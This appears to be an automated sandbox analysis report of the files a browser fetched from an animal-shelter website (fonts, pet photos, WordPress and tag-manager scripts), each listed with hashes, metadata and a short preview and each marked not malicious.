                                                                                                                                                                                                                                                        MD5:EF30691AAA51ED0D4749329C5ABD9F29
                                                                                                                                                                                                                                                        SHA1:F15BE36B095957DF80065FD075DCD2979747EBAB
                                                                                                                                                                                                                                                        SHA-256:2FD77572AD729B8E65F35C96E5DEF65372ACBB16E3A9EA3EB7B193E6EE428C70
                                                                                                                                                                                                                                                        SHA-512:C89BF4234B2A29001C45941AB57501EEAAEDCF40CBF6039FA80610A4961174152BDA75288C3B1BD2644CB057EA5C839384FD7A79ED9D14B760F8FDBE9D0616CF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=DM+Sans:400,400i,700,700i,800,500&subset=latin&display=swap"
                                                                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKK58VXh.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKy58Q.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 700;. font-display: swap;. src
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 768 x 723, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):572544
                                                                                                                                                                                                                                                        Entropy (8bit):7.983705584425439
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:EJmPe5E/G40jVH+nbtKSjF4ySVak9PLBHaE9YbrX5Qr3rzH:E8MGAh+btKOSh9ztQX58X
                                                                                                                                                                                                                                                        MD5:B004F15B12249E1DB466BEB3131E83AE
                                                                                                                                                                                                                                                        SHA1:4BF09315183A9C3C80CE39C0A44704E0B850B93B
                                                                                                                                                                                                                                                        SHA-256:00B00653330C2FD3730E221E65F987BA06BE332B981C25484DA8B56B0C0A38A3
                                                                                                                                                                                                                                                        SHA-512:AF1786F013E1628642C021B3EA0ACD79C14C867F206DC0A87719FEEDAB160319FDAAB564D7A2883869D0F03B4108E6049FA014796B72AFF033637FADA8E598F7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............\e.....pHYs..........+.... .IDATx..y...]..y..].r.Z].*..xIb.Jb....Y.4CB....Q.....i4...P...B.V....a4b...@....N.t'q..%.....r..\....=..,...=.^..,...G:.K.s.{n...... ..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D"..B]...D"..!....J.Tq..'..D"..+'&..HdF.a/.:.:...7....x.....xF)U_..D".H$....@$r..B.n.|....Xjo=..p#p.8...t....e.D..V.D....@.x`......R.....D".H....H.2!..../ ..n.R.....=H`.3p....pk{[8O.y...x...#`.$.'.u`... ..D"..CL.".K.6.. A....8.T..nA.:./.!~.x`.x.x.x.8.~.Rjt..-..D".W.1..D..B.=$...R........#...v......#I.7.O(.V/.qE".H$r....H.".B8........@...H...E.A..i././".@..D".H$r...@$r..1.;...x..v...C.>..~x..D...~...2\l....H$..D^).j...'B..R.....x..x..'.O.....X...H$..|... .9.Z.#.m...."...W.&.i.......#..D"...N.zF"...nD...d..vd.7rn9.|...|.YJ.;...e@+.......%D.... .8....*b'\..R...G.D"..1..D^..].a.N..?..'..^-. K....Y.x..".K....bn..d....._#A.t).tw..d..%.....'.G.}#.)....D"W.1..D.....Bu.....A*Y.He+r..Hep.....Q...
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1021)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1590
                                                                                                                                                                                                                                                        Entropy (8bit):5.164128754121163
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:S+wOTWXY6K6qFMSnilfl2lYFSnNVGUmx5N5:xT8Y6KZAUmxz5
                                                                                                                                                                                                                                                        MD5:5BE7221067EC06B5CF0DA08275E362F2
                                                                                                                                                                                                                                                        SHA1:5FA371DFA579B506290E9EF74B24E124B0245CD5
                                                                                                                                                                                                                                                        SHA-256:3FC2845D22C09928BA9DAE73F657A21EDE05BED89A42EFAFE1028BCBE4EE499B
                                                                                                                                                                                                                                                        SHA-512:1CF71CD6D65811DC11719D810B8F77F63BF65353443B44196BA3FAF2FD15E2CA612049AC5032D422479BF21EFB2A3EA297592EBC5D1EE83A74AD2B4CBB06D177
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:;(function($){$(document).ready(function(){var newWindowArr=qpprFrontData.linkData;var root=qpprFrontData.siteURL;var qroot=qpprFrontData.siteURLq;$('a[href]').each(function(){var thisMatch=$(this);var href=typeof $(this).attr('href')!=='undefined'?$(this).attr('href'):'';var linkFound=qppr_in_array(href,newWindowArr);if(linkFound!==false){var rel='undefined'!==typeof $(this).attr('rel')?$(this).attr('rel'):'';var tar='undefined'!==typeof $(this).attr('target')?$(this).attr('target'):'';var doNW=false;var doNF=false;var rURL='';var hChk=href;if(linkFound=='1'){doNW=newWindowArr[href][0];doNF=newWindowArr[href][1];rURL=newWindowArr[href][2];}else if(linkFound=='2'){doNW=newWindowArr[href.replace(root,'')][0];doNF=newWindowArr[href.replace(root,'')][1];rURL=newWindowArr[href.replace(root,'')][2];hChk=href.replace(root,'');}else if(linkFound=='3'){doNW=newWindowArr[href.replace(qroot,'')][0];doNF=newWindowArr[href.replace(qroot,'')][1];rURL=newWindowArr[href.replace(qroot,'')][2];hChk=hre
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (43468), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):43468
                                                                                                                                                                                                                                                        Entropy (8bit):5.088830600406703
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:JQUCE4h8aKY8iLU6AbNjYh8XMnjYdXRRJ6KZ0YCQCfbbQqdnvGrsiRFBDx:U/kbNzEtnvGrbtDx
                                                                                                                                                                                                                                                        MD5:C38A57AFEAC52B36E7D388C9361557B0
                                                                                                                                                                                                                                                        SHA1:C444755439AA7358B0D48D613D3889009D6AD975
                                                                                                                                                                                                                                                        SHA-256:F3CA085758D97F5B96744402A4749852139FFE2FA36DEFE830C97F5DFFDC5113
                                                                                                                                                                                                                                                        SHA-512:B820B8DC79F07420C0DFC477F95477D8CB397B3FDC76AA42FBDBC849DFC4CC2C125797F04D7BC52874541B9911E67F3287A73F8D1509E921085E965ADA304632
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(()=>{var i={87097:(i,e,t)=>{var o,s,n;!function(){"use strict";s=[t(41669)],o=function(i){var e,t=window.Slick||{};(e=0,t=function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,t){return i('<button type="button" />').text(t+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:0,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide:!1,touchMove:!0,touchThreshold:5,useCSS:!0
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):18013
                                                                                                                                                                                                                                                        Entropy (8bit):7.964826972080405
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:GMC/rIyqIZiBfeADZMlXz8rFhIP7k3/mX120p3YMjNWJWi:GMm0HIchevlDQNuX3YM5WJr
                                                                                                                                                                                                                                                        MD5:37C7D9A891B71BBC337BD5DA2C401D23
                                                                                                                                                                                                                                                        SHA1:2B164EE30887CB5CB34FB01D5A1F989273DCCB21
                                                                                                                                                                                                                                                        SHA-256:76B23DF361024F1A0D6718D0FE236AF85A5E065D2281D086A71FDC15C011BFE7
                                                                                                                                                                                                                                                        SHA-512:FA7F5C44A22D8C78A8311B510BBCE2FDFEF6FBF79A94CDBCD161786543C2902EA259E8F0ECBFEB5F82601DA89A5CE5A8CF1B26088F4E4D795B14838C98C82700
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/992893bc-1286-43f9-9f38-1674ef2cec80.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........;.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...SQ_....7..^..TR..u...Q...^k..Lj.'..u*..@\6*P..EJ.V...-...R*..h...)_....-J..S....Z.V.-J.E.EJ.V......@..$...H7..ye...HG..G..L..j..nk0.:.....j.T.....S....*i.(~..W3.........b-L.B.J.g..0T.Ui.*EZB.W"..J..xZ...N.I..8-=R..T...S....ZxZz.i.h..}.E^i.i.U.E .........8..5.q.M6..\.O....M.&....K..K..[.D.......q...r".8..kEJFn..S.,...j#w....b..m_P...[u&.e8..T$....Z....J..Qd1
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 14 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:20 12:45:19, hostcomputer=iPhone 14 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):51759
                                                                                                                                                                                                                                                        Entropy (8bit):7.8887902907618574
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:i3XVdpS7CEiFkMjGMXV6oJEcEnskxFN5TSpq:i3FciFkoZV/JEXskxFNN7
                                                                                                                                                                                                                                                        MD5:DBD44CBB3563CAE97C636C2B324846FF
                                                                                                                                                                                                                                                        SHA1:447A64A087186D5FFD8C77D653D360E3724EE6D5
                                                                                                                                                                                                                                                        SHA-256:84E8649B856B7863C15D1DE6F274E33ACCFCA4A97129DDB90E7540199699FF8A
                                                                                                                                                                                                                                                        SHA-512:E679F895F89FDD60228AFEF4B207B6074982D1142D1DE7914F5574B1026835E7327F4162CA43870C5B9F44C8B61F103C1FA7F870070E16A0580148D93F597249
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/d448be62-5a8d-43eb-bb05-207e8e527e20.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......f.......Apple.iPhone 14 Plus.H.......H.......18.1.1.2024:12:20 12:45:19.iPhone 14 Plus.H.......H......."."...........'.......@...........0232............................................395.........395.........0100....................................................................................................................................2...........3...........4...1...........................'.........../...........C...........W..........._...........g...........o...........w...............|...............-05:00.-05:00.-05:00..Q......}.-.....................Apple.iPhone 14 Plus back dual wide camera 5.7mm f/1.5.....<...........2024:12:20 12:45:19.2024:12:20 12:45:19......(..wl...\..k....E..........9............./.Apple iOS...MM.2.......................l.......h...l...............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (2085), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2085
                                                                                                                                                                                                                                                        Entropy (8bit):5.243739436237358
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:7+ovc0Qm9qjgB+cafqM2fA7nBOCRbHDTAw0fsFrKPH:ycce9qjXsbA7nBOmbHf0fsFiH
                                                                                                                                                                                                                                                        MD5:765D1BFBB7D1DB226B087D7CCFA2AD4A
                                                                                                                                                                                                                                                        SHA1:6BA8DCE308F8069E2C378D0B8C4330384DECD8EC
                                                                                                                                                                                                                                                        SHA-256:8109773F354963AB77668F0B5D65D2B0C82F27917A994D1CC50A4EA43C00749E
                                                                                                                                                                                                                                                        SHA-512:5228DE0E86D2131AAB18A1E2798D2B39050E1BE26FC3CFF95B26CA783C28E535384BA34F3D8A2573FCBF1AD2ABF75B93C6EDAB101D4AFB4053535F3270C0AF0A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontend.min.js?ver=10.4.2
                                                                                                                                                                                                                                                        Preview:(()=>{if(window.TVE_Dash=window.TVE_Dash||{},!e||!e.$j){var a=window.$,e={$j:jQuery.noConflict()};a&&(window.$=a)}!function(a){TVE_Dash.ajax_sent=!1;var t={},s={};TVE_Dash.add_load_item=function(e,n,o){var r;if("function"!=typeof o&&(o=a.noop),TVE_Dash.ajax_sent){var i={},_={};return i[e]=n,_[e]=o,this.send_ajax(i,_),!0}return n?(t[e]&&"function"==typeof(null===(r=console)||void 0===r?void 0:r.warn)&&console.warn(e+" ajax action already defined"),t[e]=n,s[e]=o,!0):(console.error&&console.error("missing ajax data"),!1)},TVE_Dash.ajax_load_css=function(e){a.each(e,(function(e,t){a("link#"+(e+="-css")).length||a('<link rel="stylesheet" id="'+e+'" type="text/css" href="'+t+'"/>').appendTo("head")}))},TVE_Dash.ajax_load_js=function(e){var t=document.body;a.each(e,(function(s,n){if(-1!==s.indexOf("_before"))return!0;var o=document.createElement("script");e[s+"_before"]&&a('<script type="text/javascript">'+e[s+"_before"]+"<\/script>").after(t.lastChild),s&&(o.id=s+"-script"),o.src=n,t.appendC
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1223)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):19500
                                                                                                                                                                                                                                                        Entropy (8bit):5.498773117154881
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:vclH09vODrdbmuL4Uq9XrnUWGXKsYWo19+EXenkjuBXog/U716uSxuE4h9aeBGB8:UBqmDrlmuL4DrUWahYWIQEXenyu/U8uP
                                                                                                                                                                                                                                                        MD5:C95E13C6D4A9E7826F721ACD6CA6E8D6
                                                                                                                                                                                                                                                        SHA1:7A96E3AA1F2ABAD2E1AA605AA043D05535716537
                                                                                                                                                                                                                                                        SHA-256:36CD1F4E41872C8D5536DF9207FA9A7715E83C98AD5E2C8319C7BF3E89BC16D3
                                                                                                                                                                                                                                                        SHA-512:C3955F6BD35813A60CF05625E0FA383598C2CEA93AE0C15B03B743CDA612BF8AF3BDCD570D8E1A12281BBF506E251C8E6E12F9F37D824F7CC09CA2940B941693
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/static/service_worker/5160/sw.js?origin=https%3A%2F%2Findyhumane.org
                                                                                                                                                                                                                                                        Preview:'use strict';var aa=function(a){function b(d){return a.next(d)}function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})},h=function(a){return aa(a())};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self;var r,x;a:{for(var ba=["CLOSURE_FLAGS"],A=n,B=0;B<ba.length;B++)if(A=A[ba[B]],A==null){x=null;break a}x=A}var ca=x&&x[610401301];r=ca!=null?ca:!1;var E;const da=n.navigator;E=da?da.userAgentData||null:null;function F(a){return r?E?E.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function G(a){var b;a:{const c=n.navigator;if(c){const d=c.userAgent;if(d){b=d;break a}}b=""}return b.indexOf(a)!=-1};function H(){return r?!!E&&E.brands.length>0:!1}function I(){return H()?F("Chromium"):(G("Chrome")||G("CriOS"))&&!(H()?0:G("Edge"))||G("Silk")};!G("Android")||I();I();G("Safari")&&(I()||(H()?0:G("Coast"))||(H()?0:G("Opera"))||(H()?0:G("Edge"))||(
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 900 x 629, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):734033
                                                                                                                                                                                                                                                        Entropy (8bit):7.994706339921343
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:12288:Ch4FTZNPnSDJnkBuE35ZyuBFQYD139yrjBCl+Z/V2VBgQtd7vm20HAOPn6d7SSWb:CsNPnruE35ZyuBFf4sEZd2VKv20gOw7i
                                                                                                                                                                                                                                                        MD5:CAA8E1FA3E868402B75BBD54903338C2
                                                                                                                                                                                                                                                        SHA1:EB4090A72AF4E71B1F2912A7A38E5829107E9E5A
                                                                                                                                                                                                                                                        SHA-256:E3AF465B372A79CFE013A2AF8CA3351F36186D3AC4492218809627AE4DCED51E
                                                                                                                                                                                                                                                        SHA-512:64F8C745FBF4E9A1012A837C7EEBC5E10B2EA4521D1487DA8765DF2C973FDF8FA7174B7AE4513296913025FFE966E585752A68EE34701F5DC8FAF851C683BEB6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2023/06/get-involved-home.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......u.......>3....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (422)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):457
                                                                                                                                                                                                                                                        Entropy (8bit):5.062678748736029
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:Uz77mxDChzQiwBmGam7vp9PSu7QqBYAQ7:Q778Ch3wBmGH7vKM7ux
                                                                                                                                                                                                                                                        MD5:E4BC17CC45CA91AB0F09DEA134975C51
                                                                                                                                                                                                                                                        SHA1:3C03312717FB495C051D02A3D27EC0D8ABC2557D
                                                                                                                                                                                                                                                        SHA-256:5A43A22E48F94B7A45A9A9B1A107F197213B73307FDFA2E6B2DAADAB264F94D2
                                                                                                                                                                                                                                                        SHA-512:F8E537A2168B94875BB7DDB9A20037C5BC79831C8B4E726F224F8D7C723C5C4B4512551697CF7BFB6CE4B5F8365DC1C027107FFE3435EA27C686F5AE96D921E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var e={d:(t,d)=>{for(var o in d)e.o(d,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:d[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};function d(e){"undefined"!=typeof document&&("complete"!==document.readyState&&"interactive"!==document.readyState?document.addEventListener("DOMContentLoaded",e):e())}e.d(t,{default:()=>d}),(window.wp=window.wp||{}).domReady=t.default})();
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):39389
                                                                                                                                                                                                                                                        Entropy (8bit):7.976852572796149
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:wAVhx5jinWFTR7Y0wuNLr1p76yspIKsrl2tQFQpcb4YGYe+DoCVf9NcDLRpW:wex5KW/PpLr1YysWP2T1UvJvcA
                                                                                                                                                                                                                                                        MD5:9D09830B986C482CD3AFED2F815C7C76
                                                                                                                                                                                                                                                        SHA1:D2A05D5839E661B8C817D5AC3B3E1551DB704A16
                                                                                                                                                                                                                                                        SHA-256:0B5987A6BFEA516130A198F70C097F1DDC40A8046D08867DB13C078ACB2659D2
                                                                                                                                                                                                                                                        SHA-512:47CEE1F8BFB47CE2A659D6E3E0C1D9E66A07A938887DF2808FFF1A288B5A441809BDB6E2F1C0E37004D6903657BF1E8D83697DD7770C6855F7D58F6D31A2B83E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/a66346fd-1c41-4492-b9c9-20a54b4e16d2.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..)..#.iZ.;Hq.n*f^x...B...S...f....."&.I..J.t..>..B{.i..M4..sM".z.M....y.v....a.M.8.M<..8....@.y..O.I....7...M4....h&....%..*L...:.GZ..(..-...@.Os..]s....@......?..L.;.1@.....R..:(&..Z.....3.)sGZ..(4......p4.J(..)...N...P.8p))....~i..P..)....=E!...........1.N9....ps..G.!...a..H..#.."5..53/.4..B..0..4.0(..Z..v...Xb....H9.Hi.."$.MHi.....a...FM.!.M".M2.....4..M.....I.RS.R..f....SI.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 8a, xresolution=186, yresolution=194, software=HDR+ 1.0.695519190zd, datetime=2024:12:11 13:28:09, xresolution=243, yresolution=251, GPS-Data], baseline, precision 8, 420x559, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):73162
                                                                                                                                                                                                                                                        Entropy (8bit):7.954265452011154
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:h3yQwLz1eK4NmhEQ6/cpBSRsoeCwmHIxgfyvQ8A/Zc6FXfynq3WPr:h39K4kGQ6UTi9wmoxgsQ9C6IW+r
                                                                                                                                                                                                                                                        MD5:1D7512CD33466BEC9592707210E4F368
                                                                                                                                                                                                                                                        SHA1:5CC996E91E6B0B5C458E0767A4201080BE2FE6E8
                                                                                                                                                                                                                                                        SHA-256:26B65B268350CC42A831412CB133737E46B59937D91ACF4DFA56431C10F91300
                                                                                                                                                                                                                                                        SHA-512:4CA77F2739A536D5B3116C6519C707EF9356D3B433BFDC3A0CB080BEB5F9F1C8D55354989DB27A8E83A7F2AFFF3243E34D2916D16EF06A65A142379A3B22EA39
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/ee1a5486-3cd8-45f1-ac23-a1101b1ab628.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 8a.H.......H.......HDR+ 1.0.695519190zd.2024:12:11 13:28:09.H.......H.......(."...........'...................0232............................................891.........891.........891.........0100................................................................................................................................................................................................3...........4...#...............(...........0...........8...........L...........`...........h...........p...........x.......................................................-05:00.-05:00.-05:00.Google.Pixel 8a back camera 5.43mm f/1.89.. ..@B......d...2024:12:11 13:28:09.2024:12:11 13:28:09.....d.......d.......d...............d...........6.....................................N...........W.......
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 36848, version 1.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):36848
                                                                                                                                                                                                                                                        Entropy (8bit):7.995112872818791
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:768:57Wc/aUQVBlB85eA5/ULxb14Nv3zyMfD9zriUE2knMVQu:57WYWVBlBj2/UVRchr62kMVQu
                                                                                                                                                                                                                                                        MD5:3CCD9AB2050B2F26898B77AF9148B8E2
                                                                                                                                                                                                                                                        SHA1:7F9F46B2FB3F121F3C0600E1182D725B1BE6C176
                                                                                                                                                                                                                                                        SHA-256:258F9F1B553BB57419619F41D3B1445226C7BC63D2A3409EFEF4A68426709E94
                                                                                                                                                                                                                                                        SHA-512:6F9F764D77A563A132E952BD49790F22AA80A88F885BB9AA82F1C25BBC9FBA1451F3E4FADD1EABDF86DC77F7FCDC13C5B183AEE617077F3061E04D54E7246AFE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2
